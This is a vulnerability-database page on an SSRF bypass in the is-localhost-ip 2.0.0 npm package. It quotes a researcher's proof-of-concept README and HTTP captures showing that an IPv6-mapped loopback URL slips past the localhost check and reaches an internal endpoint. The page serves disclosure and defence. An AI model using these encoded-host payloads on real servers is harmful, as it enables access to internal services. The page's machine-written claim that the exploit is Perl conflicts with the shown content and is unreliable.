is-localhost-ip 2.0.0 - SSRF
is-localhost-ip 2.0.0 - SSRF
AI Analysis
Technical Summary
The is-localhost-ip 2.0.0 package is vulnerable to SSRF, which can allow an attacker to manipulate server-side requests. The exploit code is publicly available in Perl, but no official patch or fix has been documented. The vulnerability could be leveraged to access internal network resources or services that are otherwise inaccessible externally.
Potential Impact
An attacker exploiting this SSRF vulnerability could cause the server to make unauthorized requests to internal or external systems, potentially leading to information disclosure or interaction with internal services. No evidence of active exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, restrict or validate inputs that influence server-side requests to prevent SSRF exploitation.
Indicators of Compromise
- exploit-code: # Titles: is-localhost-ip 2.0.0 - SSRF # Author: nu11secur1ty # Date: 11/09/2025 # Vendor: https://github.com/tinovyatkin/is-localhost-ip # Software: https://github.com/tinovyatkin/is-localhost-ip/releases/tag/v2.0.0 # Reference: https://portswigger.net/web-security/ssrf ## Description: # SSRF PoC — Professional README **WARNING: This repository contains a proof‑of‑concept (PoC) demonstrating an SSRF / localhost canonicalization bypass. Run only on isolated, non-production machines (local VM, sandbox). Do NOT expose to the internet.** ## Overview This PoC demonstrates how a naive server that blocks "localhost" by name can be bypassed using alternate IP encodings (hex, decimal, octal, IPv6-mapped). The included `index.js` is a **tested, minimal** Express app that: - Provides `/check-url?url=<URL>` which checks `is-localhost-ip(hostname)` and fetches the URL if allowed. - Provides `/secret` that returns a generated secret-style JSON object (used to prove leakage). - Includes a test harness to exercise multiple host encodings — **tests are disabled by default** and must be explicitly enabled with `ENABLE_SELF_TEST=1`. ## Files included - `PoC.js` — the PoC server (safe by default: self-tests disabled unless enabled). - `package.json` — minimal package manifest. - `README.md` — this file. ## Quick security summary (read before running) - **Do not** run this on machines that have access to production networks, secret stores, or sensitive services. - The PoC generates synthetic API keys at `/secret`. If a test succeeds, a generated key will be returned by `/check-url` — treat that as proof-of-concept and not a real secret, unless you wired it to a real system. - Prefer running inside an isolated VM with no network access to your corporate network; or a disposable container with blocked egress to RFC1918 and loopback. ## Requirements - Node.js **v18+** (for built-in `fetch`). - npm (comes with Node). ## Setup ```bash # create directory and extract the archive or clone this repo # inside the project directory: npm install ``` `package.json` in this archive will install: - `express` - `is-localhost-ip` - `ipaddr.js` (used by the safer checks in the index.js) ## How to run (safe default) By default, the server will **not** run the self-tests. To start the server: ```bash node PoC.js ``` You should see: ``` Express server running on http://localhost:3005 Self-tests disabled (set ENABLE_SELF_TEST=1 to enable) ``` Then in another terminal: ```bash curl "http://localhost:3005/check-url?url=https://example.com" ``` Expected: fetched content preview (if allowed). ## How to run the internal tests (ONLY in an isolated environment) If you want to run the bypass tests to reproduce the PoC **locally and isolated**, enable them explicitly: ```bash ENABLE_SELF_TEST=1 node PoC.js ``` The process will run a set of encoded-hostname tests against the local `/secret` endpoint and print a summary. If any variant returns `200` and the response includes `"apikey":`, that variant demonstrated a bypass in your environment. ## How to disable the `/secret` endpoint (extra safety) If you want to remove the sensitive test endpoint entirely, edit `PoC.js` and remove or comment out the `/secret` route. ## Safe patch summary (what this PoC does to be safer) - Resolves hostnames to IP addresses server-side using DNS and checks all addresses against ipaddr.js ranges (rejects loopback/private/link-local/reserved). - Rejects non-http(s) schemes, credentials in URL, and non-allowed ports. - Avoids following redirects when fetching upstream resources. - Disables automatic self-tests by default (opt-in). ## Responsible disclosure template If you plan to report this behavior to a maintainer/vendor, use the template in the original analysis or contact the project privately with: - Node version, OS, `is-localhost-ip` version - Minimal PoC command and the exact payload(s) that worked - Logs showing the returned JSON that includes the generated `apikey` ## License This PoC is provided for testing and defensive purposes only. Use at your own risk. No warranty. ---------------------------------------------------------------- STATUS: Medium [+]Payload + Exploit Burp Suite: ``` # normal 403 Forbidden GET /check-url?url=http://10.10.0.28:3005 HTTP/1.1 Host: 10.10.0.28:3005 Content-Len gth: 2 Content-Length: 2 HTTP/1.1 403 Forbidden X-Powered-By: Express Content-Type: application/json; charset=utf-8 Content-Length: 33 ETag: W/"21-6j4oICVQ6Z+6nx0WETDHqqeeklM" Date: Sun, 09 Nov 2025 09:29:34 GMT Connection: keep-alive Keep-Alive: timeout=5 {"error":"localhost not allowed"} ----------------------------------------------------------------- # Exploit GET /check-url?url=http://[::ffff:7f00:1]:3005 HTTP/1.1 Host: 10.10.0.28:3005 Content-Len gth: 2 Content-Length: 2 HTTP/1.1 200 OK X-Powered-By: Express Content-Type: text/html; charset=utf-8 Content-Length: 306 ETag: W/"132-0QnJdvy6r/DgvnNvBs+i8eLbOLc" Date: Sun, 09 Nov 2025 09:29:28 GMT Connection: keep-alive Keep-Alive: timeout=5 {"message":"Express server running","usage":"GET /check-url?url= https://10.10.0.28:3005","examples":["GET /check-url?url= https://httpbin.org/json","GET /check-url?url=http://localhost:8080","GET /check-url?url=https://google.com"],"endpoints":["GET /","GET /check-url?url=<URL>","GET /secret"],"port":3005} ``` # Reproduce: [href]( https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2025/CVE-2025-9960 ) # Demo: [href](https://www.patreon.com/posts/cve-2025-9960-is-143172786) # Time spent: 03:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
is-localhost-ip 2.0.0 - SSRF
Description
is-localhost-ip 2.0.0 - SSRF
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The is-localhost-ip 2.0.0 package is vulnerable to SSRF, which can allow an attacker to manipulate server-side requests. The exploit code is publicly available in Perl, but no official patch or fix has been documented. The vulnerability could be leveraged to access internal network resources or services that are otherwise inaccessible externally.
Potential Impact
An attacker exploiting this SSRF vulnerability could cause the server to make unauthorized requests to internal or external systems, potentially leading to information disclosure or interaction with internal services. No evidence of active exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, restrict or validate inputs that influence server-side requests to prevent SSRF exploitation.
Technical Details
- Edb Id
- 52496
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for is-localhost-ip 2.0.0 - SSRF
# Titles: is-localhost-ip 2.0.0 - SSRF # Author: nu11secur1ty # Date: 11/09/2025 # Vendor: https://github.com/tinovyatkin/is-localhost-ip # Software: https://github.com/tinovyatkin/is-localhost-ip/releases/tag/v2.0.0 # Reference: https://portswigger.net/web-security/ssrf ## Description: # SSRF PoC — Professional README **WARNING: This repository contains a proof‑of‑concept (PoC) demonstrating an SSRF / localhost canonicalization bypass. Run only on isolated, non-production machines (local VM... (5864 more characters)
Threat ID: 69d4e432aaed68159a0d4576
Added to database: 4/7/2026, 11:02:10 AM
Last enriched: 4/7/2026, 11:02:14 AM
Last updated: 4/8/2026, 1:45:31 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.